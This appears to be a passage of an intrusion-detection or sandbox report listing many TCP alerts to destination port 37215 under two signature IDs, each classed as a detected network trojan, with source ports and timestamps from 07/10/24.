                  SID:2829579
                  Source Port:33382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.962060
                  SID:2829579
                  Source Port:36838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.466916
                  SID:2835222
                  Source Port:56006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.805293
                  SID:2829579
                  Source Port:50862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.000608
                  SID:2829579
                  Source Port:49272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.819532
                  SID:2829579
                  Source Port:39656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.188191
                  SID:2835222
                  Source Port:39312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.254961
                  SID:2835222
                  Source Port:48260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.830052
                  SID:2835222
                  Source Port:44104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.386874
                  SID:2829579
                  Source Port:45542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.914881
                  SID:2829579
                  Source Port:36460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.384931
                  SID:2835222
                  Source Port:54412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.576530
                  SID:2829579
                  Source Port:53044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.207005
                  SID:2835222
                  Source Port:35758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.842727
                  SID:2835222
                  Source Port:36322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.864338
                  SID:2835222
                  Source Port:57640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.461757
                  SID:2829579
                  Source Port:59274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.817367
                  SID:2835222
                  Source Port:44714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.131981
                  SID:2829579
                  Source Port:47302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.295095
                  SID:2835222
                  Source Port:34910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.177890
                  SID:2829579
                  Source Port:43852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.178484
                  SID:2835222
                  Source Port:56852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.819552
                  SID:2829579
                  Source Port:36868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.165723
                  SID:2829579
                  Source Port:40842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.692447
                  SID:2829579
                  Source Port:45170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.011649
                  SID:2829579
                  Source Port:34174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.667418
                  SID:2829579
                  Source Port:40532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.120282
                  SID:2829579
                  Source Port:48604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.514840
                  SID:2829579
                  Source Port:40586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.781687
                  SID:2829579
                  Source Port:51382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.599918
                  SID:2835222
                  Source Port:54716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.860758
                  SID:2835222
                  Source Port:51156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.778030
                  SID:2829579
                  Source Port:57034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.022558
                  SID:2835222
                  Source Port:38834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.440883
                  SID:2829579
                  Source Port:50142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.393644
                  SID:2835222
                  Source Port:38392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.996817
                  SID:2829579
                  Source Port:48918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.272664
                  SID:2829579
                  Source Port:54208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.975524
                  SID:2829579
                  Source Port:51520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.663550
                  SID:2835222
                  Source Port:50632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.561697
                  SID:2829579
                  Source Port:49596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.830052
                  SID:2835222
                  Source Port:41658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.047210
                  SID:2835222
                  Source Port:39472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.597937
                  SID:2829579
                  Source Port:55388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.616284
                  SID:2835222
                  Source Port:34400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.552864
                  SID:2829579
                  Source Port:33602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.907238
                  SID:2829579
                  Source Port:54702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.432094
                  SID:2835222
                  Source Port:32918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.186455
                  SID:2835222
                  Source Port:42040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.600152
                  SID:2835222
                  Source Port:42368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.328472
                  SID:2835222
                  Source Port:53450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.584785
                  SID:2835222
                  Source Port:39056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.617808
                  SID:2835222
                  Source Port:41766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.479319
                  SID:2835222
                  Source Port:36182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.664529
                  SID:2835222
                  Source Port:38954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.538749
                  SID:2835222
                  Source Port:37450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778157
                  SID:2835222
                  Source Port:37570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.454696
                  SID:2835222
                  Source Port:36736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.081333
                  SID:2829579
                  Source Port:34680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.252784
                  SID:2829579
                  Source Port:36050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.647460
                  SID:2835222
                  Source Port:36764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.216208
                  SID:2829579
                  Source Port:34260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.937800
                  SID:2835222
                  Source Port:59394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.512064
                  SID:2829579
                  Source Port:47760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.177669
                  SID:2829579
                  Source Port:60298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.357123
                  SID:2829579
                  Source Port:59682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.019858
                  SID:2829579
                  Source Port:48272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.294744
                  SID:2829579
                  Source Port:42286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.841293
                  SID:2835222
                  Source Port:49178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.989369
                  SID:2829579
                  Source Port:33938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.816598
                  SID:2835222
                  Source Port:60342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.647511
                  SID:2835222
                  Source Port:43352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.176697
                  SID:2829579
                  Source Port:45024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.483664
                  SID:2829579
                  Source Port:43838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.657439
                  SID:2835222
                  Source Port:44336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.398753
                  SID:2829579
                  Source Port:35960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.529694
                  SID:2835222
                  Source Port:45126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.948624
                  SID:2829579
                  Source Port:43418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.522435
                  SID:2835222
                  Source Port:54442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.822486
                  SID:2829579
                  Source Port:58420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.278598
                  SID:2829579
                  Source Port:59320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.764696
                  SID:2829579
                  Source Port:42622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.164992
                  SID:2829579
                  Source Port:46298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.521527
                  SID:2829579
                  Source Port:55680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.550517
                  SID:2835222
                  Source Port:49188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.366759
                  SID:2835222
                  Source Port:41368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.939147
                  SID:2835222
                  Source Port:51356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.624434
                  SID:2835222
                  Source Port:35066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.441013
                  SID:2835222
                  Source Port:60746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.828457
                  SID:2835222
                  Source Port:58314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.560872
                  SID:2829579
                  Source Port:42200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.558206
                  SID:2829579
                  Source Port:50460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.547644
                  SID:2829579
                  Source Port:44996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.231914
                  SID:2829579
                  Source Port:34688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.410834
                  SID:2829579
                  Source Port:48876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.826099
                  SID:2829579
                  Source Port:53450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.015803
                  SID:2829579
                  Source Port:53496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.615628
                  SID:2829579
                  Source Port:51036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.463923
                  SID:2835222
                  Source Port:56116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.474982
                  SID:2835222
                  Source Port:52366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.574763
                  SID:2835222
                  Source Port:59674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.030888
                  SID:2835222
                  Source Port:54528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.861030
                  SID:2835222
                  Source Port:40434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.445114
                  SID:2829579
                  Source Port:44216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.593933
                  SID:2829579
                  Source Port:56982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.177272
                  SID:2829579
                  Source Port:43328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.648107
                  SID:2835222
                  Source Port:36822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.247201
                  SID:2835222
                  Source Port:48194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.550771
                  SID:2829579
                  Source Port:52674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.758011
                  SID:2829579
                  Source Port:53178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.651235
                  SID:2835222
                  Source Port:53974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.119268
                  SID:2835222
                  Source Port:49948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.208199
                  SID:2835222
                  Source Port:53772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.130365
                  SID:2829579
                  Source Port:58052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.793102
                  SID:2835222
                  Source Port:55630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.810872
                  SID:2829579
                  Source Port:48630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.285937
                  SID:2829579
                  Source Port:56110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.524436
                  SID:2829579
                  Source Port:52874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.369080
                  SID:2829579
                  Source Port:46198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.356358
                  SID:2835222
                  Source Port:53586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.896457
                  SID:2829579
                  Source Port:39704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.802348
                  SID:2835222
                  Source Port:57760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.981965
                  SID:2829579
                  Source Port:57600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.539034
                  SID:2835222
                  Source Port:53690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.875124
                  SID:2829579
                  Source Port:45326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.772266
                  SID:2829579
                  Source Port:57266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.070374
                  SID:2829579
                  Source Port:48732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.003216
                  SID:2829579
                  Source Port:42226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.782637
                  SID:2829579
                  Source Port:33406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.773562
                  SID:2835222
                  Source Port:57856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.980832
                  SID:2835222
                  Source Port:53480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.295095
                  SID:2829579
                  Source Port:54858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.359553
                  SID:2835222
                  Source Port:36604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.427359
                  SID:2829579
                  Source Port:54998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.108007
                  SID:2835222
                  Source Port:47976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.600336
                  SID:2835222
                  Source Port:52192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.326133
                  SID:2835222
                  Source Port:33822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.527598
                  SID:2835222
                  Source Port:42182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.161125
                  SID:2835222
                  Source Port:38522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.872698
                  SID:2829579
                  Source Port:48564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.162130
                  SID:2835222
                  Source Port:34964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.865886
                  SID:2829579
                  Source Port:58412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.341991
                  SID:2835222
                  Source Port:46376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.752845
                  SID:2835222
                  Source Port:58340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.937541
                  SID:2829579
                  Source Port:36490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.289116
                  SID:2829579
                  Source Port:44092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.934356
                  SID:2829579
                  Source Port:45394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.016344
                  SID:2829579
                  Source Port:37286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.566054
                  SID:2835222
                  Source Port:50410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.249351
                  SID:2835222
                  Source Port:51622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.912875
                  SID:2835222
                  Source Port:53572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.449225
                  SID:2835222
                  Source Port:58082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.762574
                  SID:2829579
                  Source Port:50320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.650487
                  SID:2829579
                  Source Port:59344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.909155
                  SID:2829579
                  Source Port:45052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.837905
                  SID:2829579
                  Source Port:36758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.425119
                  SID:2835222
                  Source Port:47392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.706462
                  SID:2835222
                  Source Port:43646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.136421
                  SID:2829579
                  Source Port:34994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.216588
                  SID:2835222
                  Source Port:49952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.590272
                  SID:2829579
                  Source Port:37474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.821478
                  SID:2829579
                  Source Port:38678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.622738
                  SID:2835222
                  Source Port:50720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.621614
                  SID:2829579
                  Source Port:39768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.489604
                  SID:2829579
                  Source Port:48030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.758837
                  SID:2829579
                  Source Port:52206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.826024
                  SID:2829579
                  Source Port:54156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.790655
                  SID:2835222
                  Source Port:57380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.564607
                  SID:2829579
                  Source Port:53040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.960576
                  SID:2835222
                  Source Port:51862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.784417
                  SID:2829579
                  Source Port:37564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.868135
                  SID:2829579
                  Source Port:48546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.764086
                  SID:2829579
                  Source Port:38888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.426359
                  SID:2829579
                  Source Port:52804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.535302
                  SID:2835222
                  Source Port:58174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.621060
                  SID:2835222
                  Source Port:43096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.020823
                  SID:2835222
                  Source Port:33666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.839060
                  SID:2835222
                  Source Port:42904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.867590
                  SID:2829579
                  Source Port:46810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.202392
                  SID:2829579
                  Source Port:46540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.650681
                  SID:2835222
                  Source Port:35246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.491692
                  SID:2829579
                  Source Port:41448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.364667
                  SID:2835222
                  Source Port:47552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
